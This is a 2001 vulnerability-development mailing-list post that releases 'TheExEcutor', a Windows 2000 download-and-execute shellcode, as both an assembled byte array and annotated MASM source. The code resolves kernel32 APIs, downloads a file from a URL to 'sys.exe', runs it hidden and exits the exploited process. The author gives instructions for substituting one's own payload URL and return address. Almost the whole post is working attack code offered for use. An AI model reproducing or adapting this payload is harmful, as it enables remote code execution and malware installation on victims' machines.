Vulnerability Development mailing list archives

TheExEcutor Class A v1.0 - Special Win32 Shellcode


From: "Enrique A. Compañ Gzz." <enrique () virtekweb net>
Date: Sat, 8 Sep 2001 15:38:24 -0500

This is the first version of my download & execute shellcode. It resolves the
API addresses it needs by walking the EXPORT table of KERNEL32.DLL at a
hard-coded kernel base (77E80000h, Windows 2000 SP1), so the base bytes must be
adjusted for any other kernel32 build.

This code is the smallest I've seen on its class... less than 300 bytes

Can be even smaller? yes... Can be more optimized? yes... That will be done
in future releases.

The Class B version of this shellcode will instead search for the functions in
the **IMPORT** table of a given image base. For example, inetinfo.exe is loaded
at 1000000h; by reading the import table there the shellcode always gets the
correct addresses (for the functions that image actually imports), so the
exploit never fails for that reason =)....
Also compression & polymorphism will be implemented.

I created an exploit that uses classB.... has never failed. (scary)

Attached to this message: The ASM code and a VC++ file to test the
shellcode.............

Note: you have to change the C++ file and put in another EIP. The one I'm using
points at a `call esp` / `jmp esp` in shell32.dll on W2K SP1, so it is specific to
that build. Also change the scode array and include the URL you want.

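/*
 * "TheExEcutor" Class A v1.0 -- assembled bytes of the MASM listing below.
 *
 * Layout (offsets into the array):
 *   0x00  jmp/jmp/call/pop chain and GetProcAddress lookup in the kernel32
 *         export table
 *   0x52  in-place decoder: every 0xFF byte of the data block becomes 0x00
 *         (the buffer holding the shellcode must therefore be writable)
 *   0x6B  LoadLibraryA("URLMON"), URLDownloadToFileA(url -> "sys.exe"),
 *         WinExec("sys.exe", SW_HIDE), ExitProcess(0)
 *   0xBB  data: kernel32 base 0x77E80000 (W2K SP1), API names, file name,
 *         URL, "KIKE" end marker
 *
 * The 286 initialised bytes contain no 0x00; 0xFF is the NUL placeholder and
 * is decoded at run time.  The URL is the last string before the marker, so it
 * may be any length, but it must not contain 0x00 or 0xFF bytes and must be
 * followed by a 0xFF.  The declared size (293) exceeds the initialiser; the
 * remaining bytes are zero-filled by the compiler.  The kernel32 base and the
 * GetProcAddress RVA trick are specific to the W2K SP1 kernel32 build; see the
 * notes in the assembly listing.  The API names are stored in clear text, so
 * the payload is easy to signature.
 */
unsigned char TheExEcutor[293] = {
    /* 0x00: jmp fix_long_jmp; pop esi; locate the kernel32 export directory */
    0xEB, 0x67, 0x5E, 0x8B, 0xEC, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x8B, 0xD8,
    0x03, 0x40, 0x3C, 0x8B, 0x40, 0x78, 0x03, 0xC3, 0x8B, 0x78, 0x20, 0x8D,
    0x3C, 0x3B, 0x03, 0x1F, 0x33, 0xD2, 0x33, 0xC9,
    /* 0x20: scan the exported names for the first one starting "GetProcA" */
    0x43, 0x38, 0x13, 0x75, 0x01, 0x41, 0x81, 0x3B, 0x47, 0x65, 0x74, 0x50,
    0x75, 0x0B, 0x81, 0x7B, 0x04, 0x72, 0x6F, 0x63, 0x41, 0x75, 0x02, 0x74,
    0x02, 0xEB, 0xE5,
    /* 0x3B: ebx = GetProcAddress (high word from the data block, low word
     *       from the export table -- assumes the RVA fits in 16 bits) */
    0x50, 0x41, 0x33, 0xC0, 0xB0, 0x04, 0xF7, 0xE1, 0x8B, 0xC8, 0x58, 0x03,
    0xC1, 0x83, 0xC0, 0x24, 0xFF, 0x76, 0x02, 0x66, 0xFF, 0x30, 0x5B,
    /* 0x52: decode 0xFF -> 0x00 in the data block until "KIKE" */
    0x56, 0x83, 0xC6, 0x04, 0x46, 0x80, 0x3E, 0xFF, 0x75, 0x03, 0x80, 0x36,
    0xFF, 0x81, 0x3E, 0x4B, 0x49, 0x4B, 0x45, 0x75, 0xEF,
    /* 0x67: jmp skip_fix_long_jmp; 0x69: jmp pi_offset (second hop) */
    0xEB, 0x02, 0xEB, 0x4B,
    /* 0x6B: pop esi; mov esp,ebp; reload base; resolve and call the APIs */
    0x5E, 0x8B, 0xE5, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x50, 0x83, 0xC6, 0x04,
    0x56, 0x50, 0xFF, 0xD3,                         /* GetProcAddress(k32, "LoadLibraryA") */
    0x83, 0xC6, 0x0D, 0x56, 0xFF, 0xD0,             /* LoadLibraryA("URLMON") */
    0x83, 0xC6, 0x07, 0x56, 0x50, 0xFF, 0xD3,       /* GetProcAddress(urlmon, "URLDownloadToFileA") */
    0x33, 0xC9, 0x51, 0x51, 0x83, 0xC6, 0x13, 0x56, 0x83, 0xC6, 0x1C, 0x56,
    0x51, 0xFF, 0xD0,                               /* URLDownloadToFileA(0, url, "sys.exe", 0, 0); result ignored */
    0x58, 0x50, 0x83, 0xEE, 0x08, 0x56, 0x50, 0xFF, 0xD3, /* GetProcAddress(k32, "WinExec") */
    0x33, 0xC9, 0x51, 0x83, 0xEE, 0x14, 0x56, 0xFF, 0xD0, /* WinExec("sys.exe", 0 /* SW_HIDE */ ) */
    0x58, 0x83, 0xC6, 0x08, 0x56, 0x50, 0xFF, 0xD3, /* GetProcAddress(k32, "ExitProcess") */
    0x33, 0xC9, 0x51, 0xFF, 0xD0,                   /* ExitProcess(0) */
    /* 0xB6: call call_back (backward call, so the displacement has no zero bytes) */
    0xE8, 0x47, 0xFF, 0xFF, 0xFF,
    /* 0xBB: kernel32 base 0x77E80000 -- only the high word (0xE8, 0x77) is used */
    0xFF, 0xFF, 0xE8, 0x77,
    /* 0xBF: "LoadLibraryA" */
    0x4C, 0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0xFF,
    /* 0xCC: "URLMON" */
    0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0xFF,
    /* 0xD3: "URLDownloadToFileA" */
    0x55, 0x52, 0x4C, 0x44, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x54,
    0x6F, 0x46, 0x69, 0x6C, 0x65, 0x41, 0xFF,
    /* 0xE6: "sys.exe" -- relative name, written to the victim's current directory */
    0x73, 0x79, 0x73, 0x2E, 0x65, 0x78, 0x65, 0xFF,
    /* 0xEE: "ExitProcess" */
    0x45, 0x78, 0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0xFF,
    /* 0xFA: "WinExec" */
    0x57, 0x69, 0x6E, 0x45, 0x78, 0x65, 0x63, 0xFF,
    /* 0x102: the URL as raw bytes -- "http://box.net/baby.exe".  Replace with
     * your own URL written the same way (hex bytes, no 0x00/0xFF inside) and
     * keep the trailing 0xFF. */
    0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x62, 0x6F, 0x78, 0x2E, 0x6E,
    0x65, 0x74, 0x2F, 0x62, 0x61, 0x62, 0x79, 0x2E, 0x65, 0x78, 0x65, 0xFF,
    /* 0x11A: "KIKE" end marker checked by the decoder */
    0x4B, 0x49, 0x4B, 0x45,
};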

  NOTE: substitute the URL with the one you want, written as hex bytes, e.g.
"0x68, 0x74, 0x74, 0x70, ..." ("http..."). The URL must not contain 0x00 or 0xFF
bytes and must be followed by the 0xFF terminator that precedes the KIKE marker.


;
; "TheExEcutor" Class A v1.0 - Win32 Shellcode
;
;  Copyright (c) 2001 by Enrique A. Compañ Gzz.
;
;  Virtek Labs
;
;  http://www.virtekweb.net/labs
;
;
;  Downloads & executes a file. It resolves the API addresses it needs
;  at run time by walking the EXPORT table of kernel32 at a hard-coded
;  kernel base of 77e80000h (Windows 2000 SP1; see vars_start). Change
;  those bytes for any other kernel32 build.
;

.386                                  ; 32-bit code, no privileged instructions used
.model flat, stdcall                  ; flat model; the Win32 APIs called below are stdcall (callee cleans the stack)

option casemap:none                   ; symbol names are case sensitive

; Only needed to build the test binary (end shell_code_start makes the
; shellcode itself the entry point).  The shellcode resolves every API
; at run time through the kernel32 export table and references nothing
; from these includes or libraries.
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib

.data

data db "blah"                        ; placeholder so a .data section exists; never referenced by the code


.code

; ---------------------------------------------------------------------
; Shellcode layout (position independent, no 00h bytes in the body):
;   shell_code_start  two short forward jumps -> pi_offset
;   pi_offset         call call_back (a backward call, so its displacement
;                     has no zero bytes) pushes the address of vars_start
;   call_back         pop esi -> esi = vars_start, falls into real_code_start
;   real_code_start   resolve GetProcAddress from the kernel32 export table,
;                     decode the 0FFh placeholders in the data block, then
;                     LoadLibraryA / URLDownloadToFileA / WinExec / ExitProcess
; Register roles: esi = data pointer, ebx = GetProcAddress, ebp = saved esp,
;                 eax/ecx/edx scratch.
; Environment assumptions (the author reports success only on W2K SP1):
;   * kernel32 is mapped at the base stored at vars_start (77E80000h);
;     another service pack or build (or anything with ASLR) crashes.
;   * GetProcAddress' RVA fits in 16 bits and the export layout matches
;     the author's kernel32 (see search_complete).
;   * the buffer holding the shellcode is writable (decode_loop patches
;     it in place) and executable.
; The API names, "sys.exe" and the URL are stored in clear text; only 00h
; is replaced by 0FFh, so the payload is trivially signaturable.
; No return value is checked: WinExec runs whether or not the download
; succeeded, and ExitProcess then kills the exploited process.
; ---------------------------------------------------------------------

shell_code_start:


        jmp fix_long_jmp             ;Hop 1 of 2: a short jmp (EB xx) avoids the zero bytes
                                     ;a 32-bit near jmp straight to pi_offset would contain

call_back:

        pop esi                      ;ESI = address of vars_start (return address pushed by the call at pi_offset)


real_code_start:

 mov ebp, esp       ;Save ESP: the push/push word/pop trick in search_complete leaves ESP off by 2

 mov eax, [esi]               ;eax = first 4 data bytes (0FFh,0FFh,0E8h,077h)
 xor ax, ax                   ;clear the low word -> 77E80000h, the assumed kernel32 base ("MZ")

 mov ebx, eax                 ;ebx = kernel32 base
 add eax, [eax+3ch]      ;eax = base + e_lfanew = "PE" header
 mov eax, [eax+78h]      ;eax = RVA of the export directory (DataDirectory[0].VirtualAddress)
 add eax, ebx       ;eax = IMAGE_EXPORT_DIRECTORY*
 mov edi, [eax+20h]      ;edi = AddressOfNames RVA
 lea edi, [edi+ebx]      ;edi = table of name RVAs

; Observed on the author's W2K SP1 kernel32 (not used by the code):
;   export directory = 77ed5c20h, name-RVA table = 77ed6f92h

 add ebx, [edi]               ;ebx = base + RVA of the first exported name (start of the name strings)
 xor edx, edx                 ;dl = 0, the terminator compared against below
 xor ecx, ecx                 ;ecx = number of terminators passed = index of the name being scanned

search_function:

 inc ebx                      ;advance one byte (the first character of the first name is never examined)
 cmp [ebx], dl                ;end of a name?
 jne  no_zero
 inc  ecx                     ;yes: the next name has index ecx
no_zero:
 cmp [ebx], DWORD PTR 'PteG'  ;"GetP" in memory order ...
 jne no_match
 cmp [ebx+4], DWORD PTR 'Acor' ;... followed by "rocA": first name starting with "GetProcA"
        jne no_match
        je  search_complete
no_match:
 jmp search_function          ;unbounded scan: a kernel32 without such a name walks off the table

search_complete:

 push eax                     ;keep the export directory pointer
 inc ecx
 xor eax, eax
 mov al, 4
 mul ecx                      ;eax = 4 * (name index + 1)
 mov ecx, eax
 pop eax
 add eax, ecx
 add eax, 024h                ;eax = exportdir + 28h + 4*index. This is AddressOfFunctions[index] only if
                              ;the function-RVA table starts right after the 28h-byte export directory and
                              ;ordinal == name index (AddressOfNameOrdinals is never read). That appears to
                              ;hold for the author's W2K SP1 kernel32 -- verify on any other build.
 push [esi+2]                 ;high word of the base (77E8h) lands in the upper half of the slot ...
 push word ptr [eax]          ;... and the low 16 bits of the function RVA in the lower half
 pop ebx       ;EBX = 77E8xxxx = GetProcAddress... only while the RVA < 10000h. ESP is now EBP-2.

; Decode the NULL chars: every 0FFh byte of the data block (after the 4 base bytes) is
; turned into 00h in place, up to the "KIKE" marker. Needs a writable buffer; the
; strings and the URL must therefore not contain 0FFh themselves.

 push esi                     ;save vars_start
        add esi, 4            ;skip the base bytes (not decoded; xor ax,ax handles them)

decode_loop:
 inc esi
 cmp byte ptr [esi], 0ffh
 jne skip_xor
 xor byte ptr [esi], 0ffh     ;0FFh -> 00h
skip_xor:
 cmp [esi], dword ptr 'EKIK'  ;"KIKE" in memory order = end of the data block
 jne decode_loop

;Trick to avoid Nulls in the first jmp instruction: hop 2 sits here, within the
;127-byte reach of both the entry jmp and the call at pi_offset.

 jmp skip_fix_long_jmp       ;Straight-line execution skips over the hop
fix_long_jmp:
 jmp pi_offset      ;Hop 2 of 2: on to the call that pushes vars_start
skip_fix_long_jmp:

;Now we Download & Execute the file and terminate. All four APIs are stdcall, so each
;call removes its own arguments and ESP returns to the slot holding the kernel32 base.

 pop esi                      ;esi = vars_start again

 mov esp, ebp      ;Normalize ESP (undo the 2-byte slip left by the pop ebx trick)

 mov eax, [esi]              ;eax = kernel32 base (same as above)
 xor ax, ax

 push eax                     ;[ebp-4] = kernel32 base, reloaded before each GetProcAddress on kernel32

 add esi, 4                   ;esi -> "LoadLibraryA"
 push esi
 push eax
        call ebx      ;eax = GetProcAddress(kernel32, "LoadLibraryA")

 add esi, 13                  ;esi -> "URLMON" (12 chars + terminator)
 push esi
 call eax      ;eax = LoadLibraryA("URLMON")

 add esi, 7                   ;esi -> "URLDownloadToFileA" (6 + 1)
 push esi
 push eax
 call ebx      ;eax = GetProcAddress(urlmon, "URLDownloadToFileA")

 xor ecx, ecx
 push ecx                     ;lpfnCB = NULL
 push ecx                     ;dwReserved = 0
 add esi, 19                  ;esi -> "sys.exe" (18 + 1)
 push esi                     ;szFileName (relative name: presumably the victim process' current directory)
 add esi, 28                  ;esi -> URL (8 + 12 + 8 bytes of sys.exe / ExitProcess / WinExec)
 push esi                     ;szURL
 push ecx      ;pCaller = NULL
 call eax                     ;URLDownloadToFileA(...); the HRESULT in eax is discarded

 pop eax                      ;eax = kernel32 base
 push eax
 sub esi, 8                   ;esi -> "WinExec"
 push esi
 push eax
 call ebx             ;eax = GetProcAddress(kernel32, "WinExec")

 xor ecx, ecx
 push ecx                     ;uCmdShow = 0 (SW_HIDE)
 sub esi, 20                  ;esi -> "sys.exe"
 push esi
 call eax      ;WinExec("sys.exe", SW_HIDE); runs even if the download failed, return value ignored

 pop eax                      ;eax = kernel32 base
 add esi, 8                   ;esi -> "ExitProcess"
 push esi
 push eax
 call ebx             ;eax = GetProcAddress(kernel32, "ExitProcess")

xor ecx, ecx
push ecx                     ;uExitCode = 0
call eax             ;ExitProcess(0): terminates the exploited process, never returns

real_code_end:


pi_offset:
        call call_back              ;Pushes the address of vars_start and jumps back (backward call: no zero bytes)

vars_start:

 db 0ffh,0ffh,0e8h,077h      ;kernel32 base 77E80000h (W2K SP1). Only the high word 077e8h is used;
                             ;change these two bytes for another kernel32 build.
 db "LoadLibraryA",0ffh      ;0FFh stands in for the NUL terminator until decode_loop runs
 db "URLMON",0ffh
 db "URLDownloadToFileA",0ffh
 db "sys.exe",0ffh           ;the add/sub esi constants above depend on these string lengths
 db "ExitProcess", 0ffh
 db "WinExec",0ffh
 db "http://box.net/baby.exe",0ffh           ;The URL: any length (it is the last string), no 00h/0FFh bytes inside. Be sure to end it with 0ffh.
db "KIKE",0h                                       ;Marker that ends decode_loop (compared as the dword 'EKIK'); nothing is read past it

end shell_code_start

--------------

Wooh... that was long...

See u....

Attachment: code.zip